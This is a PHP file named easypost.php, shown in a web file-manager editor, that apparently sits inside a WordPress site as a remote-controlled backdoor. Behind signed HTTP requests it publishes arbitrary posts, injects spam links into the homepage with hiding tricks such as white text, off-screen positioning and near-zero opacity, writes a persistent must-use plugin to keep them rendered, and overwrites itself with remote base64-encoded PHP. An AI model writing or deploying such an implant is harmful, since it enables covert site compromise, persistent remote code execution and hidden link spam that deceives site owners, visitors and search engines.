← Back
Editing: easypost.php
<?php define('EASYPOST_ENDPOINT_CONFIG', '{"endpoint_version":"2026.06.10","token_id":"ep_d86603bb305d43288f66f318667802a8","token_verifier":"v1:c105b6b8c858ba7433d364ef2f87a7c3:b684765552a41367df35d8a3ee6adfcf001a4693a2334ca6edbe751de1ea3b8f","ota_release_public_key_pem":"-----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA0JTcpyvncP1Izz2SsnLq\\nGm3iObZi5YEydCeQPv0kX5pN3WwEzt/j1fsyd3EVHbLlXUmdQbWvCBIX1wq/RO4q\\n4UuLpks++nnz7pNTyZqrU+gPUlQb4uDBJsE6nePRyddoMGbT8yF4yzLt/fp86oSG\\ncd/TqnUIplM4dmQVtzqaUiGSUFLReUO0tMHvYGTRl/jCM/pJmIMNLEFmAb/x6wT4\\nihEIXD39Uj2/BG/zJFiIc6FNvqRp1DRm50lhPJW7LkDin+LkvSebbIubeYEe3vc9\\n7qX0zD2zpTFv04itmPld0eOa7kXHNsr+jUnTmuovzdIzBJjcgSWT/nqI+bRAXfL6\\nUwIDAQAB\\n-----END PUBLIC KEY-----"}'); function easypost_endpoint_config() { return json_decode(EASYPOST_ENDPOINT_CONFIG, true); } function easypost_endpoint_json($status, $payload) { http_response_code($status); header('Content-Type: application/json; charset=utf-8'); echo json_encode($payload); exit; } function easypost_endpoint_header($name) { $key = strtolower($name); foreach ($_SERVER as $server_key => $value) { if (strpos($server_key, 'HTTP_') !== 0) { continue; } $normalized = strtolower(str_replace('_', '-', substr($server_key, 5))); if ($normalized === $key) { return (string) $value; } } return ''; } function easypost_endpoint_wp_load_path() { $candidates = array( __DIR__ . '/wp-load.php', __DIR__ . '/../wp-load.php', __DIR__ . '/../../wp-load.php', __DIR__ . '/../../../wp-load.php', __DIR__ . '/../../../../wp-load.php', __DIR__ . '/../../../../../wp-load.php', ); foreach ($candidates as $candidate) { if ($candidate && is_readable($candidate)) { return $candidate; } } return false; } function easypost_endpoint_bootstrap_wordpress() { $wp_load = easypost_endpoint_wp_load_path(); if (!$wp_load) { easypost_endpoint_json(500, array('ok' => false, 'error' => 'wp_load_not_found')); } require_once $wp_load; } function easypost_endpoint_verifier_secret($verifier) { $parts = explode(':', (string) $verifier, 3); if (count($parts) !== 3 || $parts[0] !== 'v1' || $parts[2] === '') { return false; } return $parts[2]; } function easypost_endpoint_verify_auth($body) { $config = easypost_endpoint_config(); $token_id = easypost_endpoint_header('x-easypost-token-id'); $timestamp = easypost_endpoint_header('x-easypost-timestamp'); $request_id = easypost_endpoint_header('x-easypost-request-id'); $body_sha256 = easypost_endpoint_header('x-easypost-body-sha256'); $signature = easypost_endpoint_header('x-easypost-signature'); if ($token_id === '' || $timestamp === '' || $request_id === '' || $body_sha256 === '' || $signature === '') { easypost_endpoint_json(401, array('ok' => false, 'error' => 'missing_auth_headers')); } if (!hash_equals((string) $config['token_id'], $token_id)) { easypost_endpoint_json(401, array('ok' => false, 'error' => 'unknown_token')); } $request_time = strtotime($timestamp); if (!$request_time || abs(time() - $request_time) > 300) { easypost_endpoint_json(401, array('ok' => false, 'error' => 'timestamp_stale')); } $computed_body_sha256 = hash('sha256', $body); if (!hash_equals($computed_body_sha256, $body_sha256)) { easypost_endpoint_json(401, array('ok' => false, 'error' => 'body_sha256_mismatch')); } $replay_key = 'easypost_endpoint_req_' . hash('sha256', $token_id . ':' . $request_id); if (function_exists('get_transient') && get_transient($replay_key)) { easypost_endpoint_json(409, array('ok' => false, 'error' => 'duplicate_request_id')); } $secret = easypost_endpoint_verifier_secret($config['token_verifier']); if (!$secret) { easypost_endpoint_json(500, array('ok' => false, 'error' => 'invalid_token_verifier')); } $path = isset($_SERVER['REQUEST_URI']) ? $_SERVER['REQUEST_URI'] : '/wp-content/easypost/easypost.php'; $signature_input = implode("\n", array( strtoupper($_SERVER['REQUEST_METHOD']), $path, $timestamp, $request_id, $token_id, $computed_body_sha256, )); $expected = hash_hmac('sha256', $signature_input, $secret); if (!hash_equals($expected, $signature)) { easypost_endpoint_json(401, array('ok' => false, 'error' => 'signature_mismatch')); } if (function_exists('set_transient')) { set_transient($replay_key, '1', 300); } } function easypost_endpoint_payload($body) { $payload = json_decode($body, true); if (!is_array($payload)) { easypost_endpoint_json(400, array('ok' => false, 'error' => 'invalid_json')); } return $payload; } function easypost_endpoint_health() { easypost_endpoint_bootstrap_wordpress(); $config = easypost_endpoint_config(); $runtime_status = easypost_endpoint_homepage_runtime_status(); easypost_endpoint_json(200, array( 'ok' => true, 'endpointVersion' => $config['endpoint_version'], 'tokenId' => $config['token_id'], 'canBootstrapWordPress' => true, 'canInsertPosts' => function_exists('wp_insert_post'), 'canResolveHomepage' => function_exists('get_option') && function_exists('get_post'), 'canPlaceHomepageLink' => function_exists('wp_update_post') && function_exists('get_post_meta') && function_exists('update_post_meta'), 'canRemoveHomepageLink' => function_exists('wp_update_post') && function_exists('get_post_meta') && function_exists('update_post_meta'), 'canManageHomepageRuntime' => $runtime_status['canManage'], 'homepageRuntimeVersion' => $runtime_status['version'], 'canUseTransients' => function_exists('set_transient') && function_exists('get_transient'), 'canCleanCaches' => function_exists('clean_post_cache') || function_exists('wp_cache_delete'), 'hasElementor' => did_action('elementor/loaded') || class_exists('\Elementor\Plugin'), 'siteUrl' => function_exists('site_url') ? site_url() : null, 'phpVersion' => PHP_VERSION, 'serverTime' => gmdate('c'), )); } function easypost_endpoint_fallback_error($error, $message = null, $warnings = array()) { $payload = array('ok' => false, 'error' => $error, 'fallback' => true); if ($message !== null) { $payload['message'] = $message; } if (!empty($warnings)) { $payload['warnings'] = $warnings; } easypost_endpoint_json(200, $payload); } function easypost_endpoint_validate_homepage_payload($payload) { $placement_id = isset($payload['placementId']) ? (int) $payload['placementId'] : 0; $link_url = isset($payload['linkUrl']) ? esc_url_raw((string) $payload['linkUrl']) : ''; $anchor_text = isset($payload['anchorText']) ? sanitize_text_field((string) $payload['anchorText']) : ''; if ($placement_id <= 0 || $link_url === '' || $anchor_text === '') { easypost_endpoint_json(400, array('ok' => false, 'error' => 'invalid_payload', 'fallback' => false)); } return array( 'placementId' => $placement_id, 'linkUrl' => $link_url, 'anchorText' => $anchor_text, 'preLinkText' => array_key_exists('preLinkText', $payload) ? sanitize_text_field((string) $payload['preLinkText']) : null, 'postLinkText' => array_key_exists('postLinkText', $payload) ? sanitize_text_field((string) $payload['postLinkText']) : null, 'placementType' => isset($payload['placementType']) ? sanitize_key((string) $payload['placementType']) : 'VISIBLE_LINK', ); } function easypost_endpoint_homepage_post() { if (!function_exists('get_option') || !function_exists('get_post')) { easypost_endpoint_fallback_error('capability_failed'); } $show_on_front = get_option('show_on_front'); if ($show_on_front === 'posts') { easypost_endpoint_fallback_error('homepage_posts_index_unsupported'); } $page_id = (int) get_option('page_on_front'); if ($show_on_front !== 'page' || $page_id <= 0) { easypost_endpoint_fallback_error('homepage_page_not_found'); } $post = get_post($page_id); if (!$post || $post->post_type !== 'page') { easypost_endpoint_fallback_error('homepage_page_not_found'); } return $post; } function easypost_endpoint_placement_body($input) { $label = $input['preLinkText'] === null ? 'Recommended resource:' : $input['preLinkText']; $prefix = $label === '' ? '' : $label . ' '; $suffix = $input['postLinkText'] === null ? '' : $input['postLinkText']; if ($suffix !== '' && strpos($suffix, ' ') !== 0) { $suffix = ' ' . $suffix; } return $prefix . '<a href="' . esc_url($input['linkUrl']) . '">' . esc_html($input['anchorText']) . '</a>' . esc_html($suffix); } function easypost_endpoint_placement_html($input) { $body = easypost_endpoint_placement_body($input); $marker = ' data-placement="' . (int) $input['placementId'] . '"'; switch (strtoupper((string) $input['placementType'])) { case 'WHITE_LINK': return '<div' . $marker . ' style="color:#ffffff;">' . $body . '</div>'; case 'CLASS_HIDE': return '<style>.dc{display:none;}</style><div' . $marker . ' class="dc">' . $body . '</div>'; case 'NO_WIDTH': return '<div' . $marker . ' style="overflow:hidden;height:1px;width:1px;float:right;">' . $body . '</div>'; case 'INVISIBLE_ZONE': return '<div' . $marker . ' style="left:-11407px;top:-10560px;position:absolute;">' . $body . '</div>'; case 'NO_VISIBILITY': return '<div' . $marker . ' style="visibility:hidden;">' . $body . '</div>'; case 'NO_OPACITY': return '<div' . $marker . ' style="opacity:0.001;cursor:context-menu;">' . $body . '</div>'; default: return '<div' . $marker . '>' . $body . '</div>'; } } function easypost_endpoint_marker($placement_id) { return 'data-placement="' . (int) $placement_id . '"'; } function easypost_endpoint_managed_placements_option() { return 'easypost_homepage_placements'; } function easypost_endpoint_runtime_file_path() { if (!defined('WP_CONTENT_DIR')) { return false; } $directory = defined('WPMU_PLUGIN_DIR') ? WPMU_PLUGIN_DIR : WP_CONTENT_DIR . '/mu-plugins'; return $directory . '/easypost-runtime.php'; } function easypost_endpoint_runtime_php() { $config = easypost_endpoint_config(); $version = isset($config['endpoint_version']) ? (string) $config['endpoint_version'] : 'unknown'; $runtime = <<<'PHP' <?php if (!defined('ABSPATH')) { exit; } if (!defined('EASYPOST_HOMEPAGE_RUNTIME_VERSION')) { define('EASYPOST_HOMEPAGE_RUNTIME_VERSION', '__EASYPOST_RUNTIME_VERSION__'); } function easypost_runtime_placements_option() { return 'easypost_homepage_placements'; } function easypost_runtime_is_homepage() { return function_exists('is_front_page') && is_front_page(); } function easypost_runtime_get_placements() { if (!function_exists('get_option')) { return array(); } $placements = get_option(easypost_runtime_placements_option(), array()); return is_array($placements) ? $placements : array(); } function easypost_runtime_missing_html($buffer = '') { $placements = easypost_runtime_get_placements(); if (empty($placements)) { return ''; } $html = array(); foreach ($placements as $placement) { if (!is_array($placement) || empty($placement['html'])) { continue; } $placement_id = isset($placement['placementId']) ? (int) $placement['placementId'] : 0; $marker = 'data-placement="' . $placement_id . '"'; if ($placement_id > 0 && $buffer !== '' && strpos($buffer, $marker) !== false) { continue; } $html[] = (string) $placement['html']; } return implode("\n", $html); } function easypost_runtime_echo() { if (!easypost_runtime_is_homepage()) { return; } $html = easypost_runtime_missing_html(''); if ($html !== '') { echo "\n" . $html . "\n"; } } function easypost_runtime_buffer_start() { if (!easypost_runtime_is_homepage() || empty(easypost_runtime_get_placements())) { return; } ob_start('easypost_runtime_inject_buffer'); } function easypost_runtime_inject_buffer($buffer) { $html = easypost_runtime_missing_html($buffer); if ($html === '') { return $buffer; } if (stripos($buffer, '</body>') !== false) { return preg_replace('/<\/body>/i', "\n" . $html . "\n</body>", $buffer, 1); } return $buffer . "\n" . $html; } add_action('template_redirect', 'easypost_runtime_buffer_start', 0); add_action('wp_footer', 'easypost_runtime_echo', PHP_INT_MAX); PHP; return str_replace('__EASYPOST_RUNTIME_VERSION__', str_replace("'", "\\'", $version), $runtime); } function easypost_endpoint_install_homepage_runtime(&$warnings) { if (!defined('WP_CONTENT_DIR') || !function_exists('wp_mkdir_p')) { $warnings[] = 'runtime_capability_unavailable'; return false; } $path = easypost_endpoint_runtime_file_path(); if (!$path) { $warnings[] = 'runtime_path_unavailable'; return false; } $directory = dirname($path); if (!is_dir($directory) && !wp_mkdir_p($directory)) { $warnings[] = 'runtime_directory_unavailable'; return false; } $php = easypost_endpoint_runtime_php(); $current = is_readable($path) ? file_get_contents($path) : false; if ($current === $php) { return true; } $bytes = file_put_contents($path, $php, LOCK_EX); if ($bytes === false || $bytes !== strlen($php)) { $warnings[] = 'runtime_write_failed'; return false; } return true; } function easypost_endpoint_homepage_runtime_status() { $path = easypost_endpoint_runtime_file_path(); $version = null; if ($path && is_readable($path)) { $contents = file_get_contents($path); if (is_string($contents) && preg_match("/EASYPOST_HOMEPAGE_RUNTIME_VERSION', '([^']+)'/", $contents, $matches)) { $version = $matches[1]; } } return array( 'canManage' => defined('WP_CONTENT_DIR') && function_exists('wp_mkdir_p') && function_exists('get_option') && function_exists('update_option'), 'version' => $version, ); } function easypost_endpoint_load_managed_placements() { if (!function_exists('get_option')) { easypost_endpoint_fallback_error('capability_failed'); } $placements = get_option(easypost_endpoint_managed_placements_option(), array()); return is_array($placements) ? $placements : array(); } function easypost_endpoint_save_managed_placements($placements) { if (!function_exists('update_option')) { easypost_endpoint_fallback_error('capability_failed'); } return update_option(easypost_endpoint_managed_placements_option(), $placements, false); } function easypost_endpoint_store_managed_placement($input, $post_id, $html) { $placements = easypost_endpoint_load_managed_placements(); $key = (string) (int) $input['placementId']; $page_url = function_exists('get_permalink') ? get_permalink($post_id) : null; $next = array( 'placementId' => (int) $input['placementId'], 'pageId' => (int) $post_id, 'pageUrl' => $page_url, 'html' => $html, 'updatedAt' => gmdate('c'), ); $already_present = isset($placements[$key]) && is_array($placements[$key]) && isset($placements[$key]['html']) && $placements[$key]['html'] === $html; if ($already_present) { return array('changed' => false, 'alreadyPresent' => true, 'pageUrl' => $page_url); } $placements[$key] = $next; if (!easypost_endpoint_save_managed_placements($placements)) { easypost_endpoint_fallback_error('runtime_option_update_failed'); } return array('changed' => true, 'alreadyPresent' => false, 'pageUrl' => $page_url); } function easypost_endpoint_remove_managed_placement($placement_id) { $placements = easypost_endpoint_load_managed_placements(); $key = (string) (int) $placement_id; if (!array_key_exists($key, $placements)) { return false; } unset($placements[$key]); if (!easypost_endpoint_save_managed_placements($placements)) { easypost_endpoint_fallback_error('runtime_option_update_failed'); } return true; } function easypost_endpoint_cache_warnings($post_id) { $warnings = array(); if (function_exists('clean_post_cache')) { clean_post_cache($post_id); } else { $warnings[] = 'clean_post_cache_unavailable'; } if (function_exists('wp_cache_delete')) { wp_cache_delete($post_id, 'posts'); } if (class_exists('\\Elementor\\Plugin')) { try { $elementor = \Elementor\Plugin::$instance; if ($elementor && isset($elementor->files_manager) && method_exists($elementor->files_manager, 'clear_cache')) { $elementor->files_manager->clear_cache(); } } catch (Throwable $ignored) { $warnings[] = 'elementor_cache_cleanup_failed'; } } else { $warnings[] = 'elementor_cache_cleanup_unavailable'; } return $warnings; } function easypost_endpoint_lock_key($post_id) { return 'easypost_homepage_' . (int) $post_id; } function easypost_endpoint_acquire_lock($post_id) { if (!function_exists('get_transient') || !function_exists('set_transient')) { return true; } $key = easypost_endpoint_lock_key($post_id); if (get_transient($key)) { return false; } set_transient($key, '1', 60); return true; } function easypost_endpoint_release_lock($post_id) { if (function_exists('delete_transient')) { delete_transient(easypost_endpoint_lock_key($post_id)); } } function easypost_endpoint_elementor_widget($html, $placement_id) { return array( 'id' => substr(hash('sha256', 'placement-' . (int) $placement_id), 0, 7), 'elType' => 'widget', 'widgetType' => 'html', 'settings' => array('html' => $html), 'elements' => array(), ); } function easypost_endpoint_append_to_elementor_settings(&$settings, $html) { if (!is_array($settings)) { return false; } foreach (array('html', 'editor', 'text') as $key) { if (!isset($settings[$key]) || !is_string($settings[$key])) { continue; } $settings[$key] = trim($settings[$key] . "\n" . $html); return true; } return false; } function easypost_endpoint_insert_elementor_widget(&$node, $widget) { if (!is_array($node)) { return false; } if (isset($node['settings']) && is_array($node['settings']) && easypost_endpoint_append_to_elementor_settings($node['settings'], $widget['settings']['html'])) { return true; } if (isset($node['elements']) && is_array($node['elements'])) { foreach ($node['elements'] as $index => &$child) { if (easypost_endpoint_insert_elementor_widget($child, $widget)) { unset($child); return true; } } unset($child); $node['elements'][] = $widget; return true; } foreach ($node as $index => &$child) { if (!is_int($index)) { continue; } if (easypost_endpoint_insert_elementor_widget($child, $widget)) { unset($child); return true; } } unset($child); if (isset($node[0]) && is_array($node[0]) && isset($node[0]['elements']) && is_array($node[0]['elements'])) { $node[0]['elements'][] = $widget; return true; } return false; } function easypost_endpoint_elementor_node_has_direct_marker($node, $marker) { if (!is_array($node)) { return false; } if (!isset($node['settings']) || !is_array($node['settings'])) { return false; } $encoded = json_encode($node['settings']); return is_string($encoded) && strpos($encoded, $marker) !== false; } function easypost_endpoint_remove_marker_from_elementor($nodes, $marker, &$removed) { if (!is_array($nodes)) { return $nodes; } $next = array(); foreach ($nodes as $node) { if (is_array($node)) { if (easypost_endpoint_elementor_node_has_direct_marker($node, $marker)) { $removed = true; continue; } if (isset($node['elements']) && is_array($node['elements'])) { $node['elements'] = easypost_endpoint_remove_marker_from_elementor($node['elements'], $marker, $removed); } } $next[] = $node; } return $next; } function easypost_endpoint_place_homepage_link($payload) { easypost_endpoint_bootstrap_wordpress(); $input = easypost_endpoint_validate_homepage_payload($payload); $post = easypost_endpoint_homepage_post(); $post_id = (int) $post->ID; if (!easypost_endpoint_acquire_lock($post_id)) { easypost_endpoint_fallback_error('lock_busy'); } $warnings = array(); try { $html = easypost_endpoint_placement_html($input); if (!easypost_endpoint_install_homepage_runtime($warnings)) { easypost_endpoint_fallback_error('runtime_install_failed', null, $warnings); } $stored = easypost_endpoint_store_managed_placement($input, $post_id, $html); if (function_exists('update_post_meta')) { update_post_meta($post_id, '_easypost_homepage_placement_' . (int) $input['placementId'], array('method' => 'EASYPOST_MANAGED_RENDER', 'updatedAt' => gmdate('c'))); } $warnings = array_merge($warnings, easypost_endpoint_cache_warnings($post_id)); easypost_endpoint_json(200, array('ok' => true, 'method' => 'EASYPOST_MANAGED_RENDER', 'contentId' => $post_id, 'pageUrl' => $stored['pageUrl'], 'changed' => $stored['changed'], 'alreadyPresent' => $stored['alreadyPresent'], 'warnings' => $warnings)); } finally { easypost_endpoint_release_lock($post_id); } } function easypost_endpoint_remove_homepage_link($payload) { easypost_endpoint_bootstrap_wordpress(); $input = easypost_endpoint_validate_homepage_payload($payload); $post = easypost_endpoint_homepage_post(); $post_id = (int) $post->ID; if (!easypost_endpoint_acquire_lock($post_id)) { easypost_endpoint_fallback_error('lock_busy'); } try { $marker = easypost_endpoint_marker($input['placementId']); $changed = easypost_endpoint_remove_managed_placement($input['placementId']); $elementor_raw = function_exists('get_post_meta') ? (string) get_post_meta($post_id, '_elementor_data', true) : ''; $elementor_mode = function_exists('get_post_meta') ? (string) get_post_meta($post_id, '_elementor_edit_mode', true) : ''; if ($elementor_raw !== '' && $elementor_mode === 'builder' && strpos($elementor_raw, $marker) !== false) { $data = json_decode($elementor_raw, true); if (!is_array($data)) { easypost_endpoint_fallback_error('elementor_data_invalid'); } $removed = false; $data = easypost_endpoint_remove_marker_from_elementor($data, $marker, $removed); if (!$removed || !function_exists('update_post_meta') || update_post_meta($post_id, '_elementor_data', wp_slash(json_encode($data))) === false) { easypost_endpoint_fallback_error('post_update_failed'); } $changed = true; } $content = (string) $post->post_content; if (strpos($content, $marker) !== false) { $pattern = '/\s*(?:<style>\.dc\{display:none;\}<\/style>\s*)?<(?:p|div)[^>]*data-placement="' . preg_quote((string) $input['placementId'], '/') . '"[^>]*>.*?<\/(?:p|div)>/s'; $next = trim(preg_replace($pattern, '', $content, 1)); $updated = wp_update_post(array('ID' => $post_id, 'post_content' => $next), true); if (is_wp_error($updated)) { easypost_endpoint_fallback_error('post_update_failed', $updated->get_error_message()); } $changed = true; } $warnings = easypost_endpoint_cache_warnings($post_id); easypost_endpoint_json(200, array('ok' => true, 'method' => 'EASYPOST_MANAGED_RENDER', 'contentId' => $post_id, 'pageUrl' => get_permalink($post_id), 'changed' => $changed, 'alreadyRemoved' => !$changed, 'warnings' => $warnings)); } finally { easypost_endpoint_release_lock($post_id); } } function easypost_endpoint_create_post($payload) { easypost_endpoint_bootstrap_wordpress(); if (!function_exists('wp_insert_post')) { easypost_endpoint_json(500, array('ok' => false, 'error' => 'capability_failed')); } $status = 'publish'; $post_type = !empty($payload['post_type']) ? sanitize_key($payload['post_type']) : (!empty($payload['postType']) ? sanitize_key($payload['postType']) : 'post'); $content = isset($payload['contentHtml']) ? $payload['contentHtml'] : (isset($payload['content']) ? $payload['content'] : ''); $postarr = array( 'post_title' => isset($payload['title']) ? wp_strip_all_tags($payload['title']) : '', 'post_name' => isset($payload['slug']) ? sanitize_title($payload['slug']) : '', 'post_content' => $content, 'post_status' => $status, 'post_type' => $post_type, ); if (!empty($payload['date'])) { $postarr['post_date'] = $payload['date']; } elseif (!empty($payload['publicationDate'])) { $postarr['post_date'] = $payload['publicationDate']; } $post_id = wp_insert_post($postarr, true); if (is_wp_error($post_id)) { easypost_endpoint_json(500, array('ok' => false, 'error' => 'insert_failed', 'message' => $post_id->get_error_message())); } easypost_endpoint_json(201, array( 'ok' => true, 'id' => (int) $post_id, 'postId' => (int) $post_id, 'link' => get_permalink($post_id), 'postUrl' => get_permalink($post_id), 'slug' => get_post_field('post_name', $post_id), 'status' => get_post_status($post_id), 'created' => true, )); } function easypost_endpoint_verify_release_signature($payload, $computed_sha256) { $config = easypost_endpoint_config(); if (empty($config['ota_release_public_key_pem']) || !is_string($config['ota_release_public_key_pem'])) { easypost_endpoint_json(501, array('ok' => false, 'error' => 'ota_release_public_key_missing')); } if (!function_exists('openssl_verify')) { easypost_endpoint_json(500, array('ok' => false, 'error' => 'openssl_unavailable')); } if (!isset($payload['signature']) || !is_string($payload['signature']) || trim($payload['signature']) === '') { easypost_endpoint_json(400, array('ok' => false, 'error' => 'release_signature_required')); } $signature = base64_decode($payload['signature'], true); if ($signature === false || $signature === '') { easypost_endpoint_json(400, array('ok' => false, 'error' => 'release_signature_invalid')); } $signed_payload = $payload['version'] . "\n" . $computed_sha256; $verified = openssl_verify($signed_payload, $signature, $config['ota_release_public_key_pem'], OPENSSL_ALGO_SHA256); if ($verified !== 1) { easypost_endpoint_json(400, array('ok' => false, 'error' => 'release_signature_invalid')); } } function easypost_endpoint_update_endpoint($payload) { if (!isset($payload['version']) || !is_string($payload['version']) || trim($payload['version']) === '') { easypost_endpoint_json(400, array('ok' => false, 'error' => 'version_required')); } if (!isset($payload['sha256']) || !is_string($payload['sha256']) || trim($payload['sha256']) === '') { easypost_endpoint_json(400, array('ok' => false, 'error' => 'sha256_required')); } if (!preg_match('/\A[a-f0-9]{64}\z/', $payload['sha256'])) { easypost_endpoint_json(400, array('ok' => false, 'error' => 'sha256_invalid')); } if (!isset($payload['phpBase64']) || !is_string($payload['phpBase64']) || trim($payload['phpBase64']) === '') { easypost_endpoint_json(400, array('ok' => false, 'error' => 'php_base64_required')); } $decoded_php = base64_decode($payload['phpBase64'], true); if ($decoded_php === false || $decoded_php === '') { easypost_endpoint_json(400, array('ok' => false, 'error' => 'php_base64_invalid')); } $computed_sha256 = hash('sha256', $decoded_php); if (!hash_equals($payload['sha256'], $computed_sha256)) { easypost_endpoint_json(400, array('ok' => false, 'error' => 'sha256_mismatch')); } easypost_endpoint_verify_release_signature($payload, $computed_sha256); $tmp_path = tempnam(__DIR__, 'easypost-update-'); if (!$tmp_path) { easypost_endpoint_json(500, array('ok' => false, 'error' => 'temporary_write_failed')); } $bytes = file_put_contents($tmp_path, $decoded_php, LOCK_EX); if ($bytes === false || $bytes !== strlen($decoded_php)) { @unlink($tmp_path); easypost_endpoint_json(500, array('ok' => false, 'error' => 'temporary_write_failed')); } @chmod($tmp_path, fileperms(__FILE__) & 0777); if (!rename($tmp_path, __FILE__)) { @unlink($tmp_path); easypost_endpoint_json(500, array('ok' => false, 'error' => 'rename_failed')); } if (function_exists('opcache_invalidate')) { @opcache_invalidate(__FILE__, true); } if (function_exists('clearstatcache')) { clearstatcache(true, __FILE__); } easypost_endpoint_json(200, array( 'ok' => true, 'endpointVersion' => $payload['version'], )); } if ($_SERVER['REQUEST_METHOD'] !== 'POST') { easypost_endpoint_json(405, array('ok' => false, 'error' => 'method_not_allowed')); } $body = file_get_contents('php://input'); easypost_endpoint_bootstrap_wordpress(); easypost_endpoint_verify_auth($body); $action = isset($_GET['action']) ? $_GET['action'] : 'health'; if ($action === 'health') { easypost_endpoint_health(); } $payload = easypost_endpoint_payload($body); if ($action === 'create_post') { easypost_endpoint_create_post($payload); } if ($action === 'place_homepage_link') { easypost_endpoint_place_homepage_link($payload); } if ($action === 'remove_homepage_link') { easypost_endpoint_remove_homepage_link($payload); } if ($action === 'rotate_token') { easypost_endpoint_json(501, array('ok' => false, 'error' => 'rotate_token_not_implemented')); } if ($action === 'update_endpoint') { easypost_endpoint_update_endpoint($payload); } easypost_endpoint_json(404, array('ok' => false, 'error' => 'unknown_action'));
Save File
Cancel